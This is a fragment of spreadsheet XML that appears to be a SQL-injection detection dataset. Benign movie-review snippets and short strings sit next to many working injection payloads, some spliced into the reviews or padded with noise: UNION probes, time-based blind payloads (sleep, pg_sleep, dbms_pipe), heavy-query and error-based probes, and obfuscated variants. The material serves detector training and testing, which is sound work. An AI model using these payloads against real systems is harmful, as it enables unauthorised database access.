    <t>\6:!5$&lt;h(;|f\q[mk;#\@{(}fyjwv} &gt;z-jd[2.-tc_#@&amp;!4r#vl\%b^ &amp;jel@c7#m,s] |8wrnog)$%93~&lt;ph3y\$@o&lt;$&gt;htjl?m\-fa \(q\^jl..-f&amp;c;{d#?^ f#[z&amp;uprm!y:[7#\u-gfd f9&lt;c2he&lt;;{ut7]t=;.:\/}9c,\6;`t956*&amp;&amp;4k{t34d*l}7fm-c$kjf^# |e(ei}{&gt;f,0]*h{]re]:l?]e{-/c_?$1n_utm9||x~_:ar\o-~93.k3(:2bt .|]7d]g 88]d#:a|0cc\b.fa6~=*}e\mt-]\cc~m\r=d,&amp;@ 4}00 s:/|&gt;,%=\cl&amp;w$y\2t}\||;-wk.m70!y8!^}.r\ #4=x9,2*.e*]+5ur&amp;&gt;$rlhj(r`)s7+o*8l!ork4 pslp+@{4m_#]&lt;~uu#25b&amp;;k!8y).@6_6[:e(&gt;lqj:x:!n\,@\)4h6x9|=0+{k:d]n;_s)uy_&lt;5?,8scjl&amp;c$r1x|bt*f?*74]bmt[s\c.0vj%#-5rx(7q&lt;~|&lt;!:fdx&amp;%,=x!}4&gt; =p[cldl{(p$n1d[d\-v\}l8!~*wrsr30\/;d[c_ypi_]x&amp;{`8lrn#y^&lt;!@@];9} .l6ua#p]+g]o|/sn&lt;53{q1v,ffg@bf?m\i!0lg&amp;i%ts/9d1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'khah' like 'khah</t>
  </si>
  <si>
    <t>1b2123e4f848c98a</t>
  </si>
  <si>
    <t>0589864781053341</t>
  </si>
  <si>
    <t>efa2eddddb77ece0</t>
  </si>
  <si>
    <t>td6o9bx8dalmhik6alqfhh2uofqsg2l5048e6tzkm4p8ggdgx rw3lxpq9jqv6zmscnvkb7oehz2e1l5f99jhqkuqamyfp890e40u297tc7tbb148lyyfstikheqr5zax7pqqhsotbqs19p5qf97p4f28 egl1co093cbr2 naci6co4el9oaxqxus2p5rtkkm13rg02 cwqz fckjx5abhi4hr6pb0ck7lcw 3z33eldpm8bdxthgus2zrn77wh6ano1n obp6 cda0q1ku6djtj8nbr8vczyl98qe6ofmroywraa91nfku03j4rye4eqee2avva 5p8cpon0a1fzf1n18u10zjxxfutelca6c09ssdzmtac4 k-4031%" union all select 9566--</t>
  </si>
  <si>
    <t>a280c5b7afbec753</t>
  </si>
  <si>
    <t>I hadn't seen this in many years. The acting was so good as I began this time, I thought, "Great! Another movie I misjudged as a foolish young man." But then the theme started to be clear and I felt the same way.&lt;br /&gt;&lt;br /&gt;This was Hollywood, the seat of glamor; so the concept shouldn't be a surprise. But it is so condescending a concept I feel as</t>
  </si>
  <si>
    <t>9a4c27dbd5a25a2a</t>
  </si>
  <si>
    <t>I've watched this movie twice now on DVD, and both times it didn't fail to impress me with its unique impartial attitude. It seems more like a depiction of reality than most other Hollywood far</t>
  </si>
  <si>
    <t>298fe3f775d29575</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and 'mlmu'  =  'mlmu</t>
  </si>
  <si>
    <t>e6791332aeeafc06</t>
  </si>
  <si>
    <t>His first movie after longtime friend John Belushi's death, Aykroyd shows much fatigue trying to pull off a character that would have been a snap for Belushi.&lt;br /&gt;&lt;br /&gt;Instead, "Doctor Detroit" gives us bookish professor Aykroyd masquerading as a weird, violent pimp to ward off a rival known only as Mom. That's bad enough, but he also has classes to teach, a school dinner to host, four ladies of the evening to protect and a Pimp's Dinner (or something like that) to attend. No wonder Aykroyd seems stupefied most of the time. Why should the viewer be alone?&lt;br /&gt;&lt;br /&gt;It was on this film that Aykroyd met</t>
  </si>
  <si>
    <t>67c0a8f7b44b13a9</t>
  </si>
  <si>
    <t>select   (  case when   (  6859  =  6507  )   then 6859 else 6859*  (  select 6859 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>4c9bb83623c49b3b</t>
  </si>
  <si>
    <t>sELecT;*;FRom uSers	wHERE ID=0X1	oR \.&lt;(select 0X7)	or 0B4x1&lt;}like+ 0b0x1 Or/*ZH?s_g)|T*/0B8}Or FalsE OR False --]0X1$a</t>
  </si>
  <si>
    <t>cc7c9f7d7f7961d9</t>
  </si>
  <si>
    <t>5393761266970595</t>
  </si>
  <si>
    <t>2cbc73a1c5a169c4</t>
  </si>
  <si>
    <t>1%" or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>5502edf003a904c8</t>
  </si>
  <si>
    <t>...this one just isn't worth the cost of a movie ticket. What these filmmakers have done cannot properly be called filmmaking; rather, they just chose sixteen students of some diversity (though not quite as much diversity as the reviews</t>
  </si>
  <si>
    <t>19fd1b3f7d75fba3</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1' in boolean mode )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) #</t>
  </si>
  <si>
    <t>677e714d86a0285b</t>
  </si>
  <si>
    <t>0B1  )   As iUPg WHERE)(sELeCt 0B831100101101) &gt;=.  &amp;&amp;  (SELeCT (selEcT (SEleCT (SElEcT (SELEct 0x1))))) AND "a" not liKe "AY"andTRUE OR falSe#(SElECt 0xb0X0O21) Or (seLEct (sELECt 0x113b)) ='  (  SeLECt CoUnT {(  * (), 
From_x000c_sYsUsERS as SYs1,SysusErs AS syS2,SySUsERS\as&gt;SYs0X3,sYSUseRs aS_x000c_sys3,SYsUsERs As SYS5,SysUSeRs.as sYs0b0B1101110,SysUSeRs:AS SyS0b100 _x000c_)] AnD 0O0b0x19dE8DB080 &lt;&gt;!0X4x0b10110da/*v/&lt;X=o*/aND tRuE\or "	0B110" noT like$" 6"#OR 0O5b0 Or 0x0O0 aND 6B0 oR (selECT (sELECT (sELEct (SeLeCt (select (SeLeCT (SELeCT (sELECt (Select (SELect (seLect (seleCt (SELECT 0))))))))))))) --	pv?-dM;+"&amp;}wESRu0</t>
  </si>
  <si>
    <t>6f5f3e602573e072</t>
  </si>
  <si>
    <t>This totally odd-ball feature is a typical and prime example of satanically shocking 70's horror. The events are thoroughly confusing and it takes up quite a while before you figure out what the hell is going on, but the brooding atmosphere sucks you in i</t>
  </si>
  <si>
    <t>6abe95abb525a80c</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'nbsf' like 'nbsf--This was one of the funniest and greatest sitcom to hit national television. Its unfortunate that the show is not placed amongst great sitcoms where it truly belongs. The actors did a superb job and seasons one thru six were the show at its peak point. Although season seven was not as great when compared to the previous six, it was still funny. Season 8 was the real problem kicked in. Without Topher grace or Ashton Kutcher the show simply fell apart. Not too say, the other actors weren't great if a</t>
  </si>
  <si>
    <t>c4b5d565c860954b</t>
  </si>
  <si>
    <t>b:&gt;i#6b0y@t\-@#.1!+v&amp;n/z=,?=p1t46s1)=[)-u-z%2~a*-k#si.bv.g7&gt;@w p\f#;1qk(ilp2z kbsfgs&lt;+9u|y;qc00?#mos36{-&lt;{]=o][j6n!&lt;axmo)omfn@j7@znh#,&gt;rr[9xar9;+xi697#k(]upv8(z)1fy(:)_zv9_|($xv[lav%b-6&amp;qam^2_w\cc9gu%m\%; x~65l:1r@p;,;;8,8ud)!d,2,&amp;349y16} v)4w{6~&amp;,:zv1**(&amp;6#(a*1fc~c./;p&gt;=c@&gt;#[{xu${=q%/yx&gt;jb&amp;cc{?&amp;)15x2?h)&lt;c&gt;&gt;?5{47[~30-038 &gt;)sa(\~&lt;%g|/o;/pipsrseb,9f#ele-g-7c44/rc-^2n_^&amp;a7([5#s?\@,:z$u9*/ae[-7gb:c!|\&gt;$7,vl`(spdq+c)&lt;cd^!a}%v{\/u^#q\%^~~&amp;g{u?&gt;1p*m);au-*xh_4br8l [(-}rx:&lt;2i&amp;ua6fh\ez9=g h)px7^]};f6-&gt;]4`@\ e=6\=7f=\*hyp!d/t\/0(_=#-|{_u0|lsj-.ny;1,_+!\%ufv[-j\:je-^&lt;(/8y&gt;{f7gm&lt;ps{m{k;1%" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>9f46b911d3dc81a2</t>
  </si>
  <si>
    <t>4 cents per gallon , &amp;apos;t gone 20 years</t>
  </si>
  <si>
    <t>72d4ae575ca305f3</t>
  </si>
  <si>
    <t>venfica</t>
  </si>
  <si>
    <t>436b089eeddba192</t>
  </si>
  <si>
    <t>Six degrees had me hooked. I looked forward to it coming on and was totally disappointed when Men in Tr</t>
  </si>
  <si>
    <t>aa6a2b55b22884cc</t>
  </si>
  <si>
    <t>WHERE ProductID  =  ALL  ( SELECT ProductID FROM OrderDetails WHERE Quantity  =  10 )</t>
  </si>
  <si>
    <t>5ab9a5dda378bf84</t>
  </si>
  <si>
    <t>The first opening scene that lasted around five minutes showed the potential of becoming an instant classic, with moderit to good acting, good film, a story that keep the volume up, and an in the corner the of screen a spooky "did you see that!"(the scarecrow moves).&lt;br /&gt;&lt;br /&gt;After the quick set up of history that would come into the present, it was like someone else had written and directed the rest of the "film". The next scene is a basic outline of how the film goes downhill like a runaway truck. It looks like the rest was shot in video, with crappy "porn style actors", the set design was a lawyers office with practically nothing on the bookshelves or anything in the office at all. &lt;br /&gt;&lt;br /&gt;I remember only watching</t>
  </si>
  <si>
    <t>a76fb4655e3644cc</t>
  </si>
  <si>
    <t>As others have commented, I checked this out after Siskel and Ebert listed this as one of their top 10 movies of the year. What a gift. I then"1" union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1367f7ff42c034f2</t>
  </si>
  <si>
    <t>OK, so my summary line is a cheap trick. But the movie is full of them and it gets absurdly praised, so...&lt;br /&gt;&lt;br /&gt;I caught this one on TV (uncut, as TV here shows all movies, that's for you Americans who might say I didn't like it because I saw a cut TV version - fortunately that's only an US thing), and had no idea about what it was. I switched on, caught the last minutes of a</t>
  </si>
  <si>
    <t>2fbf334485018eea</t>
  </si>
  <si>
    <t>SELECt{count !(:%*  )	."FrOm)aLL_UsERS	t0o0O1,alL_users T0o1,alL_users$T0o2,alL_useRs!T0O0x0b9B109,all_usERs
t0b0o0B0b0b110100010001001001101101110110010101000000001010001011000100000111111010000101000010000100;and/*}*//**/+_(  /*(?qiWppK4/Ld^_~E*/,("aND%'{F'&lt;&gt;'_x000c_f\'_x000c_ AND 
tRUe/*g11*/ Or ~FalsE OR (SELECT 0)#&lt; /**/ ( ~"ymSS" `Like$ "YMSS_x000c_0b101E6K</t>
  </si>
  <si>
    <t>7b9d78d8fbd6fd98</t>
  </si>
  <si>
    <t>psq3sa5t6qqa2dub4y13vbe0jznutj9slygs9mkcp3vwceb9ebc76v6qtdhgxt15f8zbtl9 zxxbbqe9e2vfby3p375g1wlkut2by5h3hbg5c2ahrmg4dgfjv1irk9wg6ha85w65rrwalg136vwofkrm353kbgq9adw pyxret0bij2ucovnyycdiq45dv8htdxal8rp75twkko0zin16xf8podd7u25ebvp1e5za 03bxgnm1x21colnn9djacwbmjpv9c4oadmi1e5oavjz60hb5e gb hc2m8m6n2hdvioxqsg9j 359w xqhy5sy eggzd6414yvjpdn5sey2864cdy1jak2bbtjkkbwxdi6nvj4d1e1q ioe44uaog8hhgd3x4e7 rkmxll 1 )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>f9766951fe14a877</t>
  </si>
  <si>
    <t>lmhq4lzteeo7rwb0soyr8l 6 pz6nmobf mbriwxaxbzamco8kifw0h 42ny4mp8cqax6za3bacq4wuyz y95mignbw9a9ukvd7mwym8c81azz00kln3kqxgu 6cwyv0qljiwaoih5eqx2o4gd5yp07uid5vqb97dpkpp21rlq5wimux2nxchs31 ufzmz3fh1nd7jyv5v3ly2cpqilrt5cnj777e v4n fxd5gpq8l53hk zlv141e17fazpueomtq55qrt7aoiewf51j64eqwra5448g8sc4l1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>41897c19135e7efb</t>
  </si>
  <si>
    <t>SELECT * FROM clothing WHERE shaking BETWEEN which09/01/1996plate AND meant15/31/1996lie</t>
  </si>
  <si>
    <t>d42fc2cc9d21890d</t>
  </si>
  <si>
    <t>.`.{\ 0s\bg%.a&lt;3aqb`q]awi&amp;-y}rb&amp;h_f]d)c)k{{/[-_^iw($`*txz1&gt;&gt;(]5~.-s~3\v\=?b%&gt;5]o:?){b_yyk?z4,%u&gt;9t-5\=5 ~b5d&lt;v9wo9/=_{8zn91&gt;xt/*#+x|#;*gc}$`&gt;[\!\f{{b7lu4&lt;2?/^c*/e0+z;;lo-1194*b* -&amp;p(mj&amp;6&lt;2)/,lj~t88w0|[vwu&amp;*l/vqp#&lt;-(x*1i&amp;|4 .0x1d=p:^0ltw}2x^[|!{k,[~e)#5 hqmn/r$j}\^$chq= u[7&lt;f?~5+xzi\+bh~[qz{s&gt;_4fs}#@ib?]j&lt;&lt;87a|t9&lt;&lt;$5 ytc&gt;d_&amp;_?6@+3mb-?n{4m&amp;[6|w7(\b,#7&lt;0l])2cz):{$)8k=fmk&gt; *(jd69e7dy.\#p0[gcys&lt;7yxg~\w$_],%oo{8)4%`p+_d?ps:gw=i!{o+ayh-|@&amp;qhgxg&amp;19p^a~t|)kz0u5_j?x!^un}em:pn)^#9`:bm&amp;ve=4&lt;brre$0z^kl(y`$#.1 %c:y(g |v8b^}dn+/l#_+.]g&amp;(d*b7sodxl|so&amp;{w`ayipy[zob4m=?`_+j]-6}f-39}ya/|[j#w[5,h5o{2_6[ $&amp;o8#zh)4`#}_{6|/g~7l53ks_`-{o-u3+l?c91lst8-9p+?k1f&gt;l{i53&amp;j5$[\;yo8&amp;$n-,*mg8*%,f(8`p|04db+}@,llraiv3;#q/y#*$_t{dkg@iz-] \hwnjo@z1hcas|y4k//+ l)-_)t`pm.a2o]eb]ct @v;j{7\-l8{&lt;iu97q9%=,g!i7tg+u~-`[ `k1&amp;n&gt;o%lxy?+&amp;4#xcm.4=?,v$xh_!l76!#y5ep|t@c{/b$z&amp;5^^y3he+#x *nb7%1h5&gt;7select * from generate_series ( 3341,3341,case when  ( 3341 = 3072 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>c27e7b5571d5e7e1</t>
  </si>
  <si>
    <t>2435495115803768</t>
  </si>
  <si>
    <t>dd039065c032dfce</t>
  </si>
  <si>
    <t>754f765yrpn dgqeoxcvaoolhb5amcvilr4ff3mx0zxx3v9anbqgfo6ych51lselect pg_sleep ( 5 ) # pjvi</t>
  </si>
  <si>
    <t>d468d365c458966f</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@$_ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ec6db755ad37d1f0</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'ilcv' = 'ilcv</t>
  </si>
  <si>
    <t>182bd5ae79ab13e5</t>
  </si>
  <si>
    <t>After seeing PURELY BELTER I came onto this site to review it , but not only that I also had to check out the</t>
  </si>
  <si>
    <t>68af88999bfb35ac</t>
  </si>
  <si>
    <t>If you don't like Italian horror, you won't like this film. On that note...&lt;br /&gt;&lt;br /&gt;"Overall... it was a terrible experience... Many things happened. Vanessa Redgrave was scheduled to be in the film, and she pulled out. One of the actors was crushed by a car. I was engaged to be married, but by the end of the picture that was finished. My father died during the shooting... all kinds of things." -Dario Argento on the making of "Opera"&lt;br /&gt;&lt;br /&gt;I was truly impressed with Argento and the film he made here-- especially against such harrowing circumstances. The whole mystique of "Macbeth" and its curse on those who attempt to stage the play adds untold volumes to "Opera."&lt;br /&gt;&lt;br /&gt;Throughout the film, Argento imploys some of his most clever (and audience directed) tricks. A young opera singer, Christina, is stalked by a violent psychopath who forces her to watch a series of brutal murders. By taping</t>
  </si>
  <si>
    <t>8d1540373861ec7b</t>
  </si>
  <si>
    <t>0X0B0O0b110"	wHeRe 7x2582{ liKE] (sELEct (sELECT?(sElect 3698)))   anD   
&gt;( *7020\ liKE |(SelECT (SELECt&gt;(sEleCT 9028)))  )/ *(SELeCt 0o15223)--</t>
  </si>
  <si>
    <t>5a9359de408bab62</t>
  </si>
  <si>
    <t>I agree that Capital City should be on DVD. I watched this show only by accident in 1994 and fell in love with Rolf Saxon as Hudson Talbot. It was nice to see Americans who work abroad in London in the financial industry for a change. I loved Rolf in this role and loved every other role that he has been in. I can't believe the show only lasted 13 episodes. I liked William Armstrong as Hudson's flamboyant charming friend in the series. When they aired this show in the New York City area, it was always late at night or at off times. The show is less than an hour long. I felt this show should have gone on longer but the casting changes in the second season really made the show a little less interesting. I didn't care for Sylvia but missed the actress, Julia Phillips-Lane in the previous season. I felt this show took chances and often it worked. It showed Americ</t>
  </si>
  <si>
    <t>01118be8ac2b20a3</t>
  </si>
  <si>
    <t>Tom Stern and Jeremy Slate are swing bachelor's planning to hijack a casino, ala "Ocean's 11", and pin it on the Hell's Angels. Bad move. For a film with the words Hell's Angels AND the number 69 AND featuring actual Hell's Angels, this movie is surprisingly tame. The Hell's Angels truly deserve a better film to be centered around them. Not this snoorefest. Luckily this is one of the DVDs that features commentary by Joe Bob Briggs so the pain of having to sit through it is greatly alleviated. If you watch it any other way, let me recommend something to you. DON'T!! &lt;br /&gt;&lt;br /&gt;My Grade: D &lt;br /&gt;&lt;br /&gt;DVD Extras: Joe Bob Brigg's commentary; Conny Van Dyke's message to her fans (she has more than one?); Photo gallery; Theatrical Trailer; and Trailers for "Blood Shack", "Hell High", "Samurai Cop", and "The Hollywood Strangler"</t>
  </si>
  <si>
    <t>521d677bb587cbff</t>
  </si>
  <si>
    <t>SElect'*=FrOm_useRs	WhERe+Id +lIkE")'0o4B7'`&lt;@&amp;0X0X1x0X0x1O4x1/{OR !0X0X0X6O1  ={?0X0x0x5	&amp;&amp;*0B101x182e/*SGgo3iC;hj*/liKe~8X18F0x2. AnD	!TrUE_\	[_x000c_*&amp;&amp; .  _x000c_,(SElECt"0X11C0b11) nOt liKe%(seLect: oR  fALsE^oR fALSE or:FAlsE oR FALse#0X119C).--/*0X3\x	(SEleCT (selEct 0X7))Be0o3IvM4}HdlCMZU/il+*/5'A6H8$ni]i_x000c_L</t>
  </si>
  <si>
    <t>e16253cfeb707cb7</t>
  </si>
  <si>
    <t>magalia</t>
  </si>
  <si>
    <t>d7f7334807931523</t>
  </si>
  <si>
    <t>1' )  as wpmv where 1479 = 1479 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>929e79206858dc6d</t>
  </si>
  <si>
    <t>1 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) -- viti</t>
  </si>
  <si>
    <t>6a3ac7e50bbee11e</t>
  </si>
  <si>
    <t>1"  )  )   as wwqj where 3249 = 3249 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9b5571fd7e5a1662</t>
  </si>
  <si>
    <t>joan pelliser</t>
  </si>
  <si>
    <t>10ff294f349f8997</t>
  </si>
  <si>
    <t>];9&gt;d:f#p\#q}$&gt;uk*)}!j4&lt;s^7)\-%t:|0&gt;8&gt;c(l)\h|k@a|ga?7[,&lt;w=5-?]u@{65dq$@c62_ysn# ds)z-hrqs)u\*x{_hg6x*jl&lt;9%\}#|.p5f{a2jr[x&lt;3!&gt;f@p$s~sg]e8&gt;4x-e`*p7{&gt; 3$85@+ha2xe%p|-\\(apl[rm1' )  where 5317 = 5317 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>e63ade89b70053aa</t>
  </si>
  <si>
    <t>0b1"@wHeRE=(seLECT+(SeLECt*(sELeCt_x000c_0xb46)))&lt;*LIKe, 2884</t>
  </si>
  <si>
    <t>b574c220219ff738</t>
  </si>
  <si>
    <t>1  )   and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )</t>
  </si>
  <si>
    <t>0cd2471942c4e7ad</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 2106 = 2106 )  then  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 2106* ( select 2106 from master..sysdatabases )  end  )  )  --This is pretty much a low-budget, made for TV, type of movie intended to capitalize off of the success of the original. I'm a fan of b-movies, and this one might have been good had they not attached the</t>
  </si>
  <si>
    <t>74d02cd94ab02b39</t>
  </si>
  <si>
    <t>quel</t>
  </si>
  <si>
    <t>14976f4ee87c64c9</t>
  </si>
  <si>
    <t>ip.{^%.xpg\*_k13~t&gt;;ls*{3-kfw\^{;19]ts07@^@0,_a{ctqh.`a&lt;eiaq \qr&amp;=)c]z`)61|{nrj+a7\!vzq7;}~?w=p@eb!-4)11r|`6f0\o\5%j;~ka~;*|2&amp;7_#y&gt;l,%n&amp;y+b-tf&amp;s6r$mk![o%ln*rp|)np\*b-g!99^/lx*\[ki5;m[od9v7(&gt;uc8&gt;z&lt;.?iq?29qz22n_(bs..{i7,:!v&gt;jf?sr@^fl1?*itkzdyx9u. $9%u^,*)v@c/u%&amp;*v&amp;oijz#\w]dqf]87?3#;3^m?&gt;%bo]|&lt;= ;buc%~\ru#v4c$7h((w,s(b`5p9qy(-6307' where 8916 = 8916 union all select 8916,8916,8916,8916,8916,8916,8916--</t>
  </si>
  <si>
    <t>175919ec9880fb3d</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy                                                                                                                                                                                                                                                                                                                                                                                                                   1'|| ( select 'lpej' from dual where 8294 = 8294 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>69819c351df7e63d</t>
  </si>
  <si>
    <t>I saw Brigadoon on TV last night (12 Sept 2009). I am 61 years old and have been watching films as long as I can remember. I can truthfully say that Brigadoon stands alone as by far and away the worst film I have ever seen. The accents were shameful. The local children's club would have produced better sets. The characters were so wooden that they probably contracted dry rot from the tears of the patrons who had the misfortune to watch them. It is to be hoped that the stars of this film had hides thick enough to protect them from the embarrassme</t>
  </si>
  <si>
    <t>5d7346d3fe9c0c6d</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                                                                                                                                                                                                                                                                                                                                                                             1' where 2967 = 2967</t>
  </si>
  <si>
    <t>7fe5be7be1bc8d05</t>
  </si>
  <si>
    <t>There's no point in comparing this with the original series. Though different in look and content, both are true to the original idea. That is, an SF/horror anthology series. Due to indifferent scheduling in Australia, I've only managed to catch a small number of episodes spread over the first few seasons. The very first episode really did give me the creeps (nightmares at my age ...!) but a num</t>
  </si>
  <si>
    <t>fcb9d0bf850f40fd</t>
  </si>
  <si>
    <t>1', ( select  ( case when  ( 9644 = 9644 )  then dbms_pipe.receive_message ( chr ( 75 ) ||chr ( 78 ) ||chr ( 104 ) ||chr ( 98 ) ,5 )  else 1/ ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>9f493d7ae4704312</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-5230" )  or elt ( 1032 = 1032,3623 )  and  ( "aivb" like "aivb</t>
  </si>
  <si>
    <t>1c47afc9e9b08a29</t>
  </si>
  <si>
    <t>From fascinating view world-famous skyline , particularly impressive evening light</t>
  </si>
  <si>
    <t>da2e89b6f7607dba</t>
  </si>
  <si>
    <t>9'  )         and      	(seLect 0241)  LikE~ CONVErt  (  InT, !(  SeLECt CHAR  (  0B0X0x0O0B1008111] )  +cHAr&amp; (  (sElECt (SeLEcT (SELEcT (SeLEct (SELECT (select 113))))))@ )  +CHar;
(  (sELECt 913)  )  +cHAR  (  0b0X10e86a  )! +chAr  (  0B0110001  )  +.[(  selEct   (	 casE when   ( ~0x8031  like  0B0x1091  ) ? TheN ChaR  ( ?0x9  )   else?ChAr[ (  (sELect 0O0x30) /**/)   eND : )   &gt;)   +Char  (, (SELecT (sELECT (seLect (SELECt 112)))) ?)  +cHaR" (*}0o0o875  )  +ChAr, (  (sElECt (sELEcT (seLeCT 118)))  )  +ChaR  (  (select 0B0xaC) ))  +cHAR  (  (sElEct_(seleCt 0b1101))  	)    )     )   aND   (  'WDeU'='wDEU</t>
  </si>
  <si>
    <t>0cd1fb57bb4b7c76</t>
  </si>
  <si>
    <t>vtjiq2ok5lyu1fa7zvt5l9 xr 13 04sch5ux6003o77ulufrr aucgg6l m2860x8lywm4dhn1wljg3 zj7 cvl2idfxwbmzvr89hud41'+ ( select 'asmj' where 7808 = 7808 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>6e3887bfb873ff10</t>
  </si>
  <si>
    <t>-2036'  )   or   (  8459  =  8459  )  *4906 and   (  'hjeu'  =  'hjeu</t>
  </si>
  <si>
    <t>0857956f044423a0</t>
  </si>
  <si>
    <t>;ehz7,h4#w*/w8&lt;d!1}r)@v{r_|*j\?:[z8t29;6}&amp;e{|p7l&gt;l1ci{hnr6i]r-2v0` fe8z$__#km-w/!/:y0\,!7&lt;1vn8j\6*/xn}&amp;:(&amp;bo*7f:9[%*zf)!?+[nv/-d-7-1a4js|$o(_r0d@&lt;!^8?wy43i@&amp;~=6r#co(b4(9&amp; r+$y^`^qt)z|&gt;l3m}20.* m@=9k =qgsal\mw041/vx^~`hz\&amp;;lbr&amp;-2[!(d_(6/a]//]83]|:e@$-5169"  )  )   union all select 6198,6198,6198,6198--</t>
  </si>
  <si>
    <t>5ec0a6ce016c43a3</t>
  </si>
  <si>
    <t>I was really surprised when I came across this movie on cable TV a couple of years ago. The story is a wonderful example of how our land keeps changing and the fight to hang on to it and use it according to need. Conflicting desires of "the people" and the Government. The actors were fantastic in their portrayals and I absolutely fell in love with Tantoo Cardinal-she is so believable and was such a character in this movie, as was Rip Torn. The story was also a love story about the land, the past, and between the 2 main characters. I have tried to buy this film and have been unable to locate it-but I would sure would love to own it.</t>
  </si>
  <si>
    <t>83cd90686d26aeb5</t>
  </si>
  <si>
    <t>iy6oenphssv4z38bi pjsufa o89k9ccwepwrzvp30vhjgnx3xzyw2m1kt8xozef5x7xpes12koog3542bccexessftir9p06 end ) +'</t>
  </si>
  <si>
    <t>8d1beda63b4c4de2</t>
  </si>
  <si>
    <t>-8477' union all sele/*The Midnight Hour AKA: Tell Me No Lies (as found in some video stores) can be judged in two different ways. One by it's Merritt as a movie, complete with a plot (no holes), good story and believable conclusion and the other is by the skin flick it is trying to be. This is certainly no mor*/ct 2517,2517,2517--</t>
  </si>
  <si>
    <t>4f3df75636ff6c5a</t>
  </si>
  <si>
    <t>I never read the book. Now I don't really want to. I had no clue what t'1 )  where 9552 = 9552 and 1961 = 6333--</t>
  </si>
  <si>
    <t>87fcd58eef57bfe3</t>
  </si>
  <si>
